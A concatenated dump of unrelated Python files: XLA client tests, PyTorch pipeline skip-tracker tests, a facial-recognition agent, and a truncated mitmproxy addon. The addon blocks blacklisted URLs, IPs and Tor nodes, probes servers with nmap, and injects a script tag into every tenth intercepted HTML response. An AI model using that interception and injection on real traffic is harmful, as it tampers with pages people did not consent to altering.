l = np.array([[4, 0, 0, 0], [6, 5, 0, 0], [2, 14, 16, 0], [3, 6, 1, 4]],
dtype=np.float32)
c = self._NewComputation()
c.Cholesky(c.Constant(np.dot(l, l.T)))
self._ExecuteAndCompareClose(c, expected=l, rtol=1e-4)
def testQR(self):
a = np.array(
[[4, 6, 8, 10], [6, 45, 54, 63], [8, 54, 146, 166], [10, 63, 166, 310]],
dtype=np.float32)
c = self._NewComputation()
c.QR(c.Constant(a), full_matrices=True)
q, r = self._Execute(c, ())
np.testing.assert_allclose(np.dot(q, r), a, rtol=1e-4)
def testTriangularSolve(self):
a_vals = np.array(
[[2, 0, 0, 0], [3, 6, 0, 0], [4, 7, 9, 0], [5, 8, 10, 11]],
dtype=np.float32)
b_vals = np.array([[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]],
dtype=np.float32)
c = self._NewComputation()
c.TriangularSolve(c.Constant(a_vals), c.Constant(b_vals), left_side=False,
lower=True, transpose_a=True)
self._ExecuteAndCompareClose(c, expected=np.array([
[0.5, 0.08333334, 0.04629629, 0.03367003],
[2.5, -0.25, -0.1388889, -0.1010101],
[4.5, -0.58333331, -0.32407406, -0.23569024],
], dtype=np.float32), rtol=1e-4)
def testIsConstant(self):
c = self._NewComputation()
a = c.ConstantS32Scalar(3)
b = c.ConstantS32Scalar(1)
x = c.ParameterFromNumpy(NumpyArrayS32(0))
const_expr = c.Sub(b, a)
non_const_expr = c.Mul(const_expr, x)
self.assertTrue(c.IsConstant(const_expr))
self.assertFalse(c.IsConstant(non_const_expr))
# self.assertTrue(c.IsConstant(c.Sub(c.Add(x, a), x))) # TODO(b/77245564)
def testGather(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
indices = np.array([[[0, 2], [2, 1]], [[1, 2], [2, 0]]], dtype=np.int32)
dnums = xla_client.GatherDimensionNumbers()
dnums.offset_dims.append(1)
dnums.offset_dims.append(2)
dnums.start_index_map.append(0)
dnums.start_index_map.append(1)
dnums.index_vector_dim = 2
c = self._NewComputation()
c.Gather(c.Constant(a), c.Constant(indices), dnums, slice_sizes=[1, 1])
g = self._Execute(c, ())
expected = np.array([[[[2, 7]]], [[[5, 6]]]], dtype=np.int32)
np.testing.assert_allclose(g, expected, rtol=1e-4)
class EmbeddedComputationsTest(ComputationTest):
"""Tests for XLA graphs with embedded computations (such as maps)."""
def _CreateConstantS32Computation(self):
"""Computation (f32) -> s32 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s32_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantS32Scalar(1)
return c.Build()
def _CreateConstantS64Computation(self):
"""Computation (f64) -> s64 that returns a constant 1 for any input."""
c = self._NewComputation("constant_s64_one")
# TODO(eliben): consider adding a nicer way to create new parameters without
# having to create dummy Numpy arrays or populating Shape messages. Perhaps
# we need our own (Python-client-own) way to represent Shapes conveniently.
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantS64Scalar(1)
return c.Build()
def _CreateConstantF32Computation(self):
"""Computation (f32) -> f32 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f32_one")
c.ParameterFromNumpy(NumpyArrayF32(0))
c.ConstantF32Scalar(1.0)
return c.Build()
def _CreateConstantF64Computation(self):
"""Computation (f64) -> f64 that returns a constant 1.0 for any input."""
c = self._NewComputation("constant_f64_one")
c.ParameterFromNumpy(NumpyArrayF64(0))
c.ConstantF64Scalar(1.0)
return c.Build()
def _CreateMulF32By2Computation(self):
"""Computation (f32) -> f32 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f32_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(2.0))
return c.Build()
def _CreateMulF32ByParamComputation(self):
"""Computation (f32) -> f32 that multiplies one parameter by the other."""
c = self._NewComputation("mul_f32_by_param")
c.Mul(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateMulF64By2Computation(self):
"""Computation (f64) -> f64 that multiplies its parameter by 2."""
c = self._NewComputation("mul_f64_by2")
c.Mul(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(2.0))
return c.Build()
def _CreateBinaryAddS32Computation(self):
"""Computation (s32, s32) -> s32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayS32(0)),
c.ParameterFromNumpy(NumpyArrayS32(0)))
return c.Build()
def _CreateBinaryAddF32Computation(self):
"""Computation (f32, f32) -> f32 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryAddF64Computation(self):
"""Computation (f64, f64) -> f64 that adds its two parameters."""
c = self._NewComputation("add_param0_by_param1")
c.Add(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateBinaryDivF32Computation(self):
"""Computation (f32, f32) -> f32 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryDivF64Computation(self):
"""Computation (f64, f64) -> f64 that divides its two parameters."""
c = self._NewComputation("div_param0_by_param1")
c.Div(
c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _CreateTestF32Lt10Computation(self):
"""Computation (f32) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f32_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF32(0)), c.ConstantF32Scalar(10.))
return c.Build()
def _CreateTestF64Lt10Computation(self):
"""Computation (f64) -> bool that tests if its parameter is less than 10."""
c = self._NewComputation("test_f64_lt_10")
c.Lt(c.ParameterFromNumpy(NumpyArrayF64(0)), c.ConstantF64Scalar(10.))
return c.Build()
def _CreateBinaryGeF32Computation(self):
"""Computation (f32, f32) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF32(0)),
c.ParameterFromNumpy(NumpyArrayF32(0)))
return c.Build()
def _CreateBinaryGeF64Computation(self):
"""Computation (f64, f64) -> bool that tests first_param >= second_param."""
c = self._NewComputation("param0_lt_param1")
c.Ge(c.ParameterFromNumpy(NumpyArrayF64(0)),
c.ParameterFromNumpy(NumpyArrayF64(0)))
return c.Build()
def _MakeSample3DArrayF32(self):
return NumpyArrayF32([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def _MakeSample3DArrayF64(self):
return NumpyArrayF64([[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]],
[[1, 2, 3], [4, 5, 6]], [[1, 2, 3], [4, 5, 6]]])
def testCallF32(self):
c = self._NewComputation()
c.Call(
self._CreateMulF32By2Computation(),
operands=(c.ConstantF32Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testCallF64(self):
c = self._NewComputation()
c.Call(
self._CreateMulF64By2Computation(),
operands=(c.ConstantF64Scalar(5.0),))
self._ExecuteAndCompareClose(c, expected=10.0)
def testMapEachElementToS32Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS32Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapEachElementToS64Constant(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantS64Computation(), [0])
self._ExecuteAndCompareExact(c, expected=[1, 1, 1, 1])
def testMapMulBy2F32(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testMapMulBy2F64(self):
c = self._NewComputation()
c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 4.0, 6.0, 8.0])
def testSimpleMapChainF32(self):
# Chains a map of constant-f32 with a map of mul-by-2
c = self._NewComputation()
const_f32 = c.Map([c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF32Computation(), [0])
c.Map([const_f32], self._CreateMulF32By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testSimpleMapChainF64(self):
# Chains a map of constant-f64 with a map of mul-by-2
c = self._NewComputation()
const_f64 = c.Map([c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0]))],
self._CreateConstantF64Computation(), [0])
c.Map([const_f64], self._CreateMulF64By2Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[2.0, 2.0, 2.0, 2.0])
def testDivVectorsWithMapF32(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF32([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF32Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testDivVectorsWithMapF64(self):
c = self._NewComputation()
c.Map((c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
c.Constant(NumpyArrayF64([5.0, 5.0, 4.0, 4.0]))),
self._CreateBinaryDivF64Computation(), [0])
self._ExecuteAndCompareClose(c, expected=[0.2, 0.4, 0.75, 1.0])
def testSelectAndScatterF32(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF32([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF32Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF32([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF32(1)),
scatter=self._CreateBinaryAddF32Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testSelectAndScatterF64(self):
c = self._NewComputation()
c.SelectAndScatter(c.Constant(NumpyArrayF64([[1., 2., 6.], [4., 5., 3.]])),
select=self._CreateBinaryGeF64Computation(),
window_dimensions=(2, 1),
window_strides=(1, 2),
padding=xla_client.PaddingType.VALID,
source=c.Constant(NumpyArrayF64([[0.1, 0.2]])),
init_value=c.Constant(NumpyArrayF64(1)),
scatter=self._CreateBinaryAddF64Computation())
self._ExecuteAndCompareClose(c, expected=[[1., 1., 1.2], [1.1, 1., 1.]])
def testReduce1DtoScalarF32(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF32([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce1DtoScalarF64(self):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(NumpyArrayF64([1.0, 2.0, 3.0, 4.0])),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=10)
def testReduce2DTo1DDim0F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim0F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[0])
self._ExecuteAndCompareClose(c, expected=[5, 7, 9])
def testReduce2DTo1DDim1F32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce2DTo1DDim1F64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=[1])
self._ExecuteAndCompareClose(c, expected=[6, 15])
def testReduce3DAllPossibleWaysF32(self):
input_array = self._MakeSample3DArrayF32()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduce3DAllPossibleWaysF64(self):
input_array = self._MakeSample3DArrayF64()
def _ReduceAndTest(*dims):
c = self._NewComputation()
c.Reduce(
operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
dimensions=dims)
self._ExecuteAndCompareClose(
c, expected=np.sum(input_array, axis=tuple(dims)))
_ReduceAndTest(0)
_ReduceAndTest(0)
_ReduceAndTest(0, 1)
_ReduceAndTest(0, 2)
_ReduceAndTest(1, 2)
_ReduceAndTest(0, 1, 2)
def testReduceWindowValidUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF32(self):
input_array = NumpyArrayF32([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF32Scalar(0),
computation_to_apply=self._CreateBinaryAddF32Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testReduceWindowValidUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.]])
def testReduceWindowSameUnitStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 1),
padding=xla_client.PaddingType.SAME)
self._ExecuteAndCompareClose(c, expected=[[5., 7., 9.], [4., 5., 6.]])
def testReduceWindowValidGeneralStridesF64(self):
input_array = NumpyArrayF64([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
c = self._NewComputation()
c.ReduceWindow(operand=c.Constant(input_array),
init_value=c.ConstantF64Scalar(0),
computation_to_apply=self._CreateBinaryAddF64Computation(),
window_dimensions=(2, 1), window_strides=(1, 2),
padding=xla_client.PaddingType.VALID)
self._ExecuteAndCompareClose(c, expected=[[5., 9.]])
def testWhileF32(self):
cond = self._CreateTestF32Lt10Computation()
body = self._CreateMulF32By2Computation()
c = self._NewComputation()
init = c.ConstantF32Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testWhileF64(self):
cond = self._CreateTestF64Lt10Computation()
body = self._CreateMulF64By2Computation()
c = self._NewComputation()
init = c.ConstantF64Scalar(1.)
c.While(cond, body, init)
self._ExecuteAndCompareClose(c, expected=16.)
def testConditionalTrue(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(True)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=6.)
def testConditionalFalse(self):
c = self._NewComputation()
pred = c.ConstantPredScalar(False)
true_operand = c.ConstantF32Scalar(3.)
true_computation = self._CreateMulF32By2Computation()
false_operand = c.ConstantF32Scalar(2.)
false_computation = self._CreateConstantF32Computation()
c.Conditional(pred, true_operand, true_computation, false_operand,
false_computation)
self._ExecuteAndCompareClose(c, expected=1.)
def testInfeedS32Values(self):
to_infeed = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
c.Infeed(xla_client.Shape.from_pyval(to_infeed[0]))
compiled_c = c.Build().CompileWithExampleArguments()
for item in to_infeed:
xla_client.transfer_to_infeed(item)
for item in to_infeed:
result = compiled_c.ExecuteWithPythonValues()
self.assertEqual(result, item)
def testInfeedThenOutfeedS32(self):
to_round_trip = NumpyArrayS32([1, 2, 3, 4])
c = self._NewComputation()
x = c.Infeed(xla_client.Shape.from_pyval(to_round_trip[0]))
c.Outfeed(x)
compiled_c = c.Build().CompileWithExampleArguments()
for want in to_round_trip:
execution = threading.Thread(target=compiled_c.Execute)
execution.start()
xla_client.transfer_to_infeed(want)
got = xla_client.transfer_from_outfeed(
xla_client.Shape.from_pyval(to_round_trip[0]))
execution.join()
self.assertEqual(want, got)
def testScatter(self):
a = np.arange(9).astype(np.int32).reshape((3, 3))
scatter_indices = np.array([0, 2], dtype=np.int32)
updates = np.array([[10, 20, 30], [70, 80, 90]], dtype=np.int32)
dnums = xla_client.ScatterDimensionNumbers()
dnums.update_window_dims.append(1)
dnums.inserted_window_dims.append(0)
dnums.scatter_dims_to_operand_dims.append(0)
dnums.index_vector_dim = 1
c = self._NewComputation()
c.Scatter(c.Constant(a), c.Constant(scatter_indices), c.Constant(updates),
self._CreateBinaryAddS32Computation(), dnums)
expected = np.array([[10, 21, 32], [3, 4, 5], [76, 87, 98]], dtype=np.int32)
self._ExecuteAndCompareClose(c, expected=expected)
class ErrorTest(ComputationTest):
def setUp(self):
self.f32_scalar_2 = NumpyArrayF32(2.0)
self.s32_scalar_2 = NumpyArrayS32(2)
def testInvokeWithWrongElementType(self):
c = self._NewComputation()
c.SetOpMetadata(xla_client.CurrentSourceInfoMetadata())
c.ParameterFromNumpy(self.s32_scalar_2)
c.ClearOpMetadata()
self.assertRaisesRegexp(
RuntimeError, r"Invalid argument shape.*xla_client_test.py.*"
r"expected s32\[\], got f32\[\]",
lambda: c.Build().CompileWithExampleArguments([self.f32_scalar_2]))
class ComputationRootTest(ComputationTest):
"""Tests related to setting the root of the computation."""
def testComputationRootDifferentFromLastOp(self):
c = self._NewComputation()
x = c.ParameterFromNumpy(NumpyArrayF32(2.0))
result = c.Add(x, c.ConstantF32Scalar(3.14))
extra = c.Add(result, c.ConstantF32Scalar(1.618)) # pylint: disable=unused-variable
arg = NumpyArrayF32(1.0)
compiled_c = c.Build(result).CompileWithExampleArguments([arg])
ans = compiled_c.ExecuteWithPythonValues([arg])
np.testing.assert_allclose(ans, 4.14)
if __name__ == "__main__":
unittest.main()
|
test_tracker.py
|
# Copyright 2019 Kakao Brain
#
# Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
from queue import Queue
import threading
import pytest
import torch
from torch import nn
from torch.distributed.pipeline.sync.checkpoint import enable_checkpointing, enable_recomputing
from torch.distributed.pipeline.sync.microbatch import Batch
from torch.distributed.pipeline.sync.skip import pop, skippable, stash
from torch.distributed.pipeline.sync.skip.layout import SkipLayout
from torch.distributed.pipeline.sync.skip.tracker import SkipTracker, SkipTrackerThroughPotals, current_skip_tracker
def test_default_skip_tracker():
q = Queue()
def f():
q.put(current_skip_tracker())
t = threading.Thread(target=f)
t.start()
t.join()
skip_tracker = q.get()
assert type(skip_tracker) is SkipTracker
assert type(skip_tracker) is not SkipTrackerThroughPotals
@pytest.mark.skipif(not torch.cuda.is_available(), reason="cuda required")
def test_default_skip_tracker_by_data_parallel():
@skippable(stash=["foo"])
class Stash(nn.Module):
def forward(self, input):
yield stash("foo", input)
return input * 2 # noqa
@skippable(pop=["foo"])
class Pop(nn.Module):
def forward(self, input):
foo = yield pop("foo")
return foo
model = nn.Sequential(Stash(), Pop())
model = nn.DataParallel(model, device_ids=[0, 0], output_device=0)
input = torch.rand(10, device=0)
output = model(input)
assert torch.allclose(output, input)
def test_reuse_portal():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
a = torch.tensor([2.0])
b = torch.tensor([2.0])
skip_tracker.save(batch, None, "test", a)
portal = skip_tracker.portals[(None, "test")]
skip_tracker.save(batch, None, "test", b)
assert portal is skip_tracker.portals[(None, "test")]
def test_no_copy_no_portal():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "copy"): (0, 1), (None, "not_copy"): (0, 0)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
a = torch.tensor([2.0])
b = torch.tensor([2.0])
skip_tracker.save(batch, None, "copy", a)
skip_tracker.save(batch, None, "not_copy", b)
assert (None, "copy") in skip_tracker.portals
assert (None, "copy") not in skip_tracker.tensors
assert (None, "not_copy") in skip_tracker.tensors
assert (None, "not_copy") not in skip_tracker.portals
def test_tensor_life_without_checkpointing():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
tensor = torch.tensor([2.0])
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 1
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 0
def test_tensor_life_with_checkpointing():
skip_layout = SkipLayout(num_partitions=2, skip_routes={(None, "test"): (0, 1)})
skip_tracker = SkipTrackerThroughPotals(skip_layout)
batch = Batch(torch.tensor([1.0]))
tensor = torch.tensor([2.0])
with enable_checkpointing():
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 2
with enable_checkpointing():
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 1
with enable_recomputing():
skip_tracker.load(batch, None, "test")
assert skip_tracker.portals[(None, "test")].tensor_life == 0
with enable_recomputing():
skip_tracker.save(batch, None, "test", tensor)
assert skip_tracker.portals[(None, "test")].tensor_life == 0
|
agent.py
|
#!/usr/bin/env python3
""" HIAS TassAI Facial Recognition Agent.
HIAS TassAI Facial Recognition Agent processes streams from local
or remote cameras to identify known and unknown humans.
MIT License
Copyright (c) 2021 Asociación de Investigacion en Inteligencia Artificial
Para la Leucemia Peter Moss
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files(the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and / or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
Contributors:
- Adam Milton-Barker
"""
import sys
from abc import ABC, abstractmethod
from modules.AbstractAgent import AbstractAgent
from modules.helpers import helpers
from modules.model import model
from modules.read import read
from modules.stream import stream
from modules.sockets import sockets
from threading import Thread
class agent(AbstractAgent):
""" HIAS TassAI Facial Recognition Agent
HIAS TassAI Facial Recognition Agent processes
streams from local or remote cameras to identify
known and unknown humans.
"""
def set_model(self, mtype):
# Inititializes the TassAI model
self.model = model(self.helpers)
def load_model(self):
""" Loads the trained model """
# Prepares the network and data
self.model.prepare_network()
self.model.prepare_data()
def server(self):
""" Loads the API server """
# Starts the MQTT connection
self.mqtt_start()
# Inititializes the socket
self.sockets = sockets(self.helpers)
# Loads the TassAI model
self.load_model()
# Camera read and stream threads
Thread(target=read.run, args=(self, ),
daemon=True).start()
Thread(target=stream.run, args=(self, ),
daemon=True).start()
def signal_handler(self, signal, frame):
self.helpers.logger.info("Disconnecting")
self.mqtt.disconnect()
sys.exit(1)
agent = agent()
def main():
if len(sys.argv) < 2:
agent.helpers.logger.info(
"You must provide an argument")
exit()
elif sys.argv[1] not in agent.helpers.confs["agent"]["params"]:
agent.helpers.logger.info(
"Mode not supported! server, train or inference")
exit()
mode = sys.argv[1]
if mode == "classify":
agent.set_model("")
agent.inference()
elif mode == "server":
agent.set_model("")
agent.server()
if __name__ == "__main__":
main()
|
https_injector.py
|
from mitmproxy.options import Options
from mitmproxy.proxy.config import ProxyConfig
from mitmproxy.proxy.server import ProxyServer
from mitmproxy.tools.dump import DumpMaster
from mitmproxy.net.http.http1.assemble import assemble_request
from bs4 import BeautifulSoup
import threading,asyncio,time,Levenshtein,pandas,sqlite3
from scapy.all import *
from scapy.layers.http import HTTPRequest # import HTTP packet
from mitmproxy.utils import strutils
from mitmproxy import ctx
from mitmproxy import http
import ipaddress,nmap,random
class Addon(object):
num=1
def request(self, flow):
self.num += 1
#for every 5 requests do a probbing
print('probs')
print(self.num)
filtered = self.list_filtering(flow)
if filtered[0]:
flow.response = http.HTTPResponse.make(
400, # (optional) status code
self.return_htmlerror(filtered[2],filtered[1]), # (optional) content
{"Content-Type": "text/html"} # (optional) headers
)
def response(self,flow):
#header analysis
proxy_headers = ['HTTP_X_FORWARDED_FOR','HTTP_X_FORWARDED','HTTP_PROXY_AGENT','HTTP_VIA','HTTP_PROXY_CONNECTION','HTTP_CLIENT_IP']
for i in flow.response.headers:
if i in proxy_headers:
soup = BeautifulSoup(self.return_htmlerror(5543,"Proxy Intrusion Detected.."))
flow.response.text = str(soup).encode("utf8")
netrequest = assemble_request(flow.request).decode('utf-8')
print("Recieved requests:",netrequest)
if flow.response.headers['Content-Type'] != 'text/html':
return
if not flow.response.status_code == 200:
return
#process every 10 requests
if self.num % 10 == 0 :
html = BeautifulSoup(flow.response.text, 'lxml')
container = html.head or html.body
if container:
script = html.new_tag('script', type='text/javascript')
script.string = injected_javascript
container.insert(0, script)
flow.response.text = str(html)
def list_filtering(self,filter_param):
#url filter
if self.sqlread_exists("url_filter","url",filter_param.request.pretty_url):
print('Found Blacklisted URL,Blocking')
return [True,"Blacklisted URL Breach..",5545]
#eppol namak ip address kitti eni matte sanam load cheyth compare cheyka
if filter_param.server_conn.ip_address:
if self.sqlread_exists("AI_filter","ip",filter_param.server_conn.ip_address[0]):
print('Proxy found by AI....')
return [True,"Stopping Breach,Heurestics Identified Proxy....",5544]
ipint = int(ipaddress.IPv4Address(filter_param.server_conn.ip_address[0]))
if self.sqlcheck_ip(ipint):
print('Found Blacklisted IP,Blocking')
return [True,"Blacklisted IP Breach..",5546]
#tor exitnodefilter
if self.sqlread_exists("tor_filter","tor_exitnodes",filter_param.request.pretty_url):
print('Found Blacklisted Tor URL node')
return [True,"Privacy breach (Tor Exit node)..",5547]
#the connection is going to a tor client
if filter_param.request.pretty_url.find('/tor/server/') != -1:
return [True,"Privacy breach (Tor Exit node)..",5547]
if self.checknmap(filter_param.server_conn.ip_address[0],filter_param.server_conn.ip_address[1]):
return [True,"Proxy detected by scanners...",5548]
else:
self.addtonmap(filter_param.server_conn.ip_address[0],filter_param.server_conn.ip_address[1])
return [False,"",0]
def return_htmlerror(self,errorcode,errordescrp):
